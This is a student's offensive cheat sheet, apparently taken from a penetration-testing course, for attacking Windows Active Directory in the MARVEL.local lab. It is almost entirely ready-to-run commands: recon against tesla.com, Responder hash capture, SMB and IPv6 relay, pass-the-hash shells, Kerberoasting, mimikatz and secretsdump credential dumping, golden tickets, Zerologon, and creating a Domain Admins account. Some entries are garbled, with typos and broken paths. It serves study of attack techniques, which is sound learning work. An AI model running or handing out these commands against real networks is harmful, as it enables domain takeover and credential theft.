I'm a Cyber Security student.
Introduction is here!
Discovering email addresses(links)=>
Gathering breached credentials=>
https://github.com/hmaverickadams/breach-parse
Hunting Subdomains=>
sublist3r -d tesla.com -t 100
Identifying website technologies=>
wappanalyzer tool
whatweb https://tesla.com
Google Dorking=>
site:tesla.com (returns results from only tesla.com website)
-www (remove results which have 'www' values)
filetype:docx (return results which filetype is docx.)
arp-scan -l
netdiscover -r 192.168.57.0/24
nmap -T4 -p- -sS -A 192.168.57.134
How to do=>
1.Open responder:
responder -I tun0 -dwPv
2.Write your ip as this format to search on File Explorer
//attacker_ip
3.Responder will give you result,you will crack in this way.
hashcat -m 5600 hash.txt /usr/share/wordlists rockyou.txt
SMB Relay=> For this attack works, SMB Signing must be disabled.
1.Checking SMB signing:
nmap --script=smb2-security-mode.nse -p445 10.0.0.0/24
2.Open responder:
responder -I tun0 -dwPv
3.Make configurations for responder tool here, '/etc/responder/Responder.conf' You need to disable (make OFF) HTTP and SMB
4.Set up your relay
sudo ntlmrelayx.py -tf targets.txt -smb2support
5.Write your ip as this format to search on File Explorer
//attacker_ip
Reminder! Run commands via ntlmrelayx.py
sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
Gaining Shell Access=>
First Way: We can use Metasploit for this.
use exploit/windows/smb/psexec
set SMBDomain MARVEL.local
set SMBUser fcastle
set SMBPass Password1
Second Way: We can use psexec.py to access
psexec.py marver.local/fcastle:'Password1'@10.0.0.25
Third way: Again, we use psexec.py to access , but with user's hashes (LM:NT), it is like Pass-The-Hash attack
psexec.py [email protected] --hashes [LM-HASH]:[NTLM-HASH]
Fourth Way: If psexec.py doesn't work for third way, you need to use wmiexec.py as below.
wmiexec.py [email protected] --hashes [LM-HASH]:[NTLM-HASH]
IPv6 attacks=>
1.Open mitm6 for target domain
sudo mitm6 -d marvel.local
2.At the same time, open ntlmrelayx.py
ntlmrelayx.py -6 -t ldaps://192.168.138.136 -wh fakewpad.marvel.local -l lootme
3.You will get results like this from '/home/kali/lootme/domain_computers.html'
Domain Enumeration with ldapdomaindump=> 1.Run below command
sudo ldapdomaindump ldaps://192.168.138.136 -u 'MARVEL\fcastle\' -p Password1
2.Then do ls command to see all things.
Domain Enumeration with bloodhound-python=> 1.Run below command -ns option means your DC(Domain Controller's IP)
sudo bloodhound-python -d MARVEL.local -u fcastle -p Password1 -ns [DC-IP] -c all
2.Then do ls command to see all things. If you want to see via GUI, you just upload .json file into Bloodhound.
Domain Enumeration with Plumhound=>
When you do below command, Bloodhound should be up! 1.
sudo python3 PlumHound.py --easy -p [YOUR_PASS]
2.Another thing for all.
sudo python3 PlumHound.py -x tasks/default.tasks -p [YOUR_PASS]
3.Finally, by opening Firefox, you can look at results.
Pass the Password=>
crackmapexec smb 10.0.0.0/24 -u fcastle -d MARVEL.local -p Password1
Grab some local hashes=>
First Way:
For this, we can use meterpreter by using hashdump.
use windows/smb/psexec
run
hasdump #you will get hashes of users.
Second Way:
secretsdump.py MARVEL.local/fcastle:[email protected]
Third Way:
secretsdump.py administrator:@192.168.138.138 --hashes [LM-HASH]:[NT-HASH]
Pass the Hash=>
crackmapexec smb 10.0.0.0/24 -u administrator -H [USER-HASH]
Reminder! Cheatsheet of crackmapexec
--local-auth : authenticate locally to each target
--sam : dump SAM hashes from target systems.
--lsa : dump LSA secrets from target systems.
--shares: enumerate shares and access
-L : List available modules for each protocol
-M : Specify module
How to use available module for crackmapexec?
crackmapexec smb 192.168.138.0/24 -u administrator -H [USER-HASH] --local-auth -M lsassy
Reminder! If you want to access database of crackmapexec, you just need to use cmedb command
Kerberoasting=>
1.Get SPNs
python GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip [DC_IP] -request
2.Crack the hash
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
Token Impersonation=>
To see all tickets on meterpreter
meterpreter > list_tokens -u
To impersonate user:
meterpreter > impersonate_token MARVEL\\administrator
To dump hashes:
mimikatz(powershell) # privilege::debug
mimikatz(powershell) # LSADump::LSA /patch
How to add a new user:
net user /add hawkeye Password1@ /domain
How to add user into group:
net group "Domain Admins" hawkeye /ADD /DOMAIN
GPP attack(cPassword attack)=> Sample Groups.xml file=>
Credential Dumping with Mimikatz=>
Mimikatz:https://github.com/gentilkiwi/mimikatz
Below command is must on Mimikatz!
mimikatz # privilege::debug
Reminder! When you write module_name then put "::" then , clicking Tab, you can get HELP
1.sekurlsa : This module is used to enumerate credentials. Example:
mimikatz # sekurlsa:logonPasswords
Dumping NTDS.dit=>
secretsdump.py MARVEL.local/pparker:'Password2'@192.168.138.132 -just-dc-ntlm
Golden Ticket Attacks=>
1.First, we get NTLM hash ,SID and relative ID of krbtgt account from KDC
mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt
2.Then using above creds, we just create golden ticket.
kerberos::golden /User:Administrator /domain:marvel.local /sid:[SID_VALUE] /krbtgt:[KRBTGT_NTLM_HASH] /id:[RELATIVE_ID] /ptt
CVE-2020-1472=> This is Abusing Zerologon.
URL=>https://github.com/SecuraBV/CVE-2020-1472
How to do=>
1.We get Administrator hash from here
secretsdump.py -just-dc MARVEL/HYDRA-DC\$@192.168.138.132
2.Now ,we need to get 'plain_password_hex' by using hash in below format.
secretsdump.py [email protected] --hashes [LM:NTLM_HASH]
3.Now, we use script from Github as below
python3 restorepassword.py MARVEL/HYDRA-DC@HYDRA-DC -target-ip 192.168.138.132 -hexpass [HEX_VALUE]
CVE-2021-1675=> This is PrintNightmare
URL=https://github.com/cube0x0/CVE-2021-1675
How to check this=> For this, we use rpcdump.py script
rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Case 1: https://tcm-sec.com/pentest-tales-001-you-spent-how-much-on-security Case 2: https://tcm-sec.com/pentest-tales-002-digging-deep
File Transfers=>
1.Powershell for Windows
certutil.exe --urlcache -f http://10.10.10.10/file.txt file.txt
2.Open HTTP server to share files on directory
python3 -m http.server --bind [your_ip] [port]